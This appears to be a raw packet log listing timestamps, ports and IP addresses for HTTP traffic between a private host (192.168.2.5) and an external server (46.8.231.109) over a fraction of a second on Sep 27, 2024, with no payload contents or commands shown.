Sep 27, 2024 00:15:07.423346996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423358917 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423376083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423394918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423470020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423481941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423491955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423501968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423515081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423527002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423527002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423556089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423609972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423619986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423631907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423643112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423652887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423660994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423690081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423701048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423712015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423723936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423755884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.507443905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.507623911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.507630110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.507636070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.507678032 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.507704020 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.507788897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.507800102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.507841110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.507987022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508050919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508152008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508168936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508208036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508236885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508325100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508336067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508374929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508374929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508511066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508544922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508555889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508565903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508575916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508585930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508586884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508586884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508599043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508608103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508610010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508637905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508640051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508649111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508652925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508658886 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508668900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508678913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508688927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508698940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508698940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508702993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508718967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508730888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508739948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508740902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508752108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508759022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508761883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508771896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508795023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508805037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508814096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508825064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508825064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508825064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508825064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508835077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508843899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508848906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508848906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508853912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508871078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508877993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508879900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508888960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508899927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508908987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508908987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508928061 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508928061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508938074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508944035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508955002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508959055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.508964062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508975029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508984089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.508992910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509002924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509012938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509015083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509015083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509030104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509046078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509057045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509057999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509057999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509067059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509069920 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509077072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509089947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509099007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509109020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509119034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509128094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509131908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509131908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509140015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509150982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509160995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509167910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509167910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509171009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509181023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509188890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509191036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509202003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509212971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509222031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.509243011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509243011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.509259939 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510341883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510354042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510370970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510380030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510390997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510406971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510410070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510410070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510416985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510426044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510435104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510445118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510447979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510456085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510471106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510479927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510483980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510483980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510492086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510513067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510540962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510543108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510543108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510551929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510561943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510565996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510571003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510581017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510586023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510590076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510595083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510600090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510606050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510632992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510643959 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.510900021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510965109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510976076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510984898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.510996103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511003971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511003971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511007071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511017084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511017084 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511028051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511038065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511054039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511058092 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511069059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511080027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511085987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511085987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511090994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511101007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511111021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511121988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511130095 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511132956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511142969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511178970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511564016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511579037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511589050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511595964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511595964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511599064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511609077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511620998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511620998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511624098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511634111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511639118 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511645079 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511656046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511666059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511676073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.511684895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511684895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511704922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.511755943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.593924999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.593947887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.593960047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.593971968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.593982935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.593993902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594002962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594006062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594048023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594048023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594115973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594127893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594137907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594149113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594160080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594171047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594187021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594187021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594218969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594237089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594379902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594388008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594398022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594408989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594419003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594429970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594439983 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594444036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594444036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594450951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594461918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594471931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594484091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594490051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594490051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594525099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594525099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594695091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594706059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594716072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594727039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594737053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594748020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594753027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594753027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594758987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594769001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594780922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594789982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594799995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594808102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594809055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594810963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594827890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594831944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594840050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594845057 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594856977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594867945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594877958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594887972 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594887972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594887972 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594899893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594907999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594909906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594923019 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594933033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594945908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.594948053 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594948053 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.594976902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.595123053 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.595463037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595474005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595484972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595494986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595506907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595510960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.595516920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595527887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595536947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595536947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.595546961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595557928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595561028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.595567942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595578909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595591068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595601082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.595601082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.595602036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.595635891 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.595654964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596179008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596189022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596200943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596218109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596223116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596227884 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596239090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596240997 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596250057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596280098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596391916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596414089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596458912 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596476078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596493006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596503973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596524000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596524000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596553087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596589088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596600056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596610069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596621990 CEST	80	49708	46.8.231.109	192.168.2.5
